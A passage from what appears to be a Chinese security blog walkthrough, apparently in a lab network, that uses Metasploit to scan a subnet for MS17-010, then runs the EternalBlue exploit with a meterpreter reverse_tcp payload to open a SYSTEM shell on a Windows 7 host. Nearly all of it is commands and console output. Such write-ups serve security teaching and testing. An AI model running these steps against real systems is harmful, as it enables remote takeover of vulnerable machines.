SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 50 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >

配置完毕之后开始运行检测

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.33.6.1:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[] 192.33.6.0/24:445 - Scanned 31 of 256 hosts (12% complete)
[] 192.33.6.0/24:445 - Scanned 53 of 256 hosts (20% complete)
[] 192.33.6.0/24:445 - Scanned 81 of 256 hosts (31% complete)
[] 192.33.6.0/24:445 - Scanned 104 of 256 hosts (40% complete)
[+] 192.33.6.151:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[] 192.33.6.0/24:445 - Scanned 132 of 256 hosts (51% complete)
[] 192.33.6.0/24:445 - Scanned 155 of 256 hosts (60% complete)
[] 192.33.6.0/24:445 - Scanned 181 of 256 hosts (70% complete)
[] 192.33.6.0/24:445 - Scanned 205 of 256 hosts (80% complete)
[] 192.33.6.0/24:445 - Scanned 243 of 256 hosts (94% complete)
[] 192.33.6.0/24:445 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

检测到内网主机Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit) 192.33.6.151存在永恒之蓝漏洞

  • 漏洞攻防

搜索相关攻击模块

msf5 > search type:exploit path:ms17_010

Matching Modules
Name Disclosure Date Rank Check Description
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 >

配置攻击模块

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.33.6.151
rhosts => 192.33.6.151
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 2222
lport => 2222
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

RHOSTS 192.33.6.151 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>‘
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST 192.33.6.150 yes The listen address (an interface may be specified)
LPORT 2222 yes The listen port

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) >

攻击获取会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[] Started reverse TCP handler on 192.33.6.150:2222
[] 192.33.6.151:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.33.6.151:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[] 192.33.6.151:445 - Scanned 1 of 1 hosts (100% complete)
[] 192.33.6.151:445 - Connecting to target for exploitation.
[+] 192.33.6.151:445 - Connection established for exploitation.
[+] 192.33.6.151:445 - Target OS selected valid for OS indicated by SMB reply
[] 192.33.6.151:445 - CORE raw buffer dump (40 bytes)
[] 192.33.6.151:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[] 192.33.6.151:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
[] 192.33.6.151:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.33.6.151:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 192.33.6.151:445 - Trying exploit with 12 Groom Allocations.
[] 192.33.6.151:445 - Sending all but last fragment of exploit packet
[] 192.33.6.151:445 - Starting non-paged pool grooming
[+] 192.33.6.151:445 - Sending SMBv2 buffers
[+] 192.33.6.151:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 192.33.6.151:445 - Sending final SMBv2 buffers.
[] 192.33.6.151:445 - Sending last fragment of exploit packet!
[] 192.33.6.151:445 - Receiving response from exploit packet
[+] 192.33.6.151:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 192.33.6.151:445 - Sending egg to corrupted connection.
[] 192.33.6.151:445 - Triggering free of corrupted buffer.
[] Sending stage (201283 bytes) to 192.33.6.151
[] Meterpreter session 2 opened (192.33.6.150:2222 -> 192.33.6.151:49296) at 2020-06-23 23:34:33 -0400
[+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.33.6.151:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

会话切换

meterpreter > bg
[*] Backgrounding session 2…
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i

Active sessions
===============
Id Name Type Information Connection

1 meterpreter php/linux www-data (33) @ DC-1 192.33.6.150:8443 -> 192.33.6.147:57700 (192.33.6.147)
2 meterpreter x64/windows NT AUTHORITYSYSTEM @ WIN-5DTIE0M734E 192.33.6.150:2222 -> 192.33.6.151:49296 (192.33.6.151)

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

 

Refference

本文由Qftm原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/209966

安全KER - 有思想的安全新媒体

分享到:微信
+110赞
收藏
Qftm
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66